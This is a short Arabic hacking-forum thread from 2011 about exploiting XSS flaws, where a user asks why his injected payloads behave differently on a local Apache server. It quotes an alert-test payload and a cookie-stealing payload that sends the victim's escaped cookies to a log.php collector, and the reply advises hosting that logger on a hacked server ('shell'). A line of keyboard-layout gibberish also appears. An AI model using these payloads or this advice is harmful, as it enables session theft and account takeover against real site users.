[ تم التجديد ] ~ شرح كامل متكامل لتغرات xss ~ | احترافي ..~

bleu moon · 08-22-2011, 07:35 AM

اقتباس

المشاركة الأصلية كتبت بواسطة mass1993


	يعطيك العافية اخوي عالشرح ...ولكن عندي استفسار: انا عندي سيرفر شخصي اباتشي اصدار 2.5.8 ووضعت ملف الثغرة فيه وكل اشي تمام...ولكن لما كتبت هذا الكود بالمتصفح: كود: '"--></style></script>*************("Www.VBspiders.com")</script> وضغطت انتر ما طلعلي تنبيه في المتصفح وطبعلي التاليي: كود: \'\" ولكن لما كتبت الامر هذا : كود: '"--></style></script>***********(4444444)</script> وضغطت انتر طلع التنبيه وكل اشي تمام... ولكن لما اجيت احط هذا الامر: كود: "><a href="#" onclick="****.location='http://localhost/log.php' +escape(****.****);"><Click Me></a></script> ورحت لملف nor15din ما لقيت اشي فيه...اخوي شو هالمشكلة بالله عليك وليش صار هيك معي؟؟؟ تحياتي

انت رافع ملف الوج على السيرفرا الشخصي وهذا غلط !
لازم يكون ع شل :(

v]: hsjyghg xss >>Z pjn hsjovh[ hg;,;d. la;gi l,q,u l,ru g;k hg]dk hgw,v hpjvht hsjtshv []d] vtu avp

التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام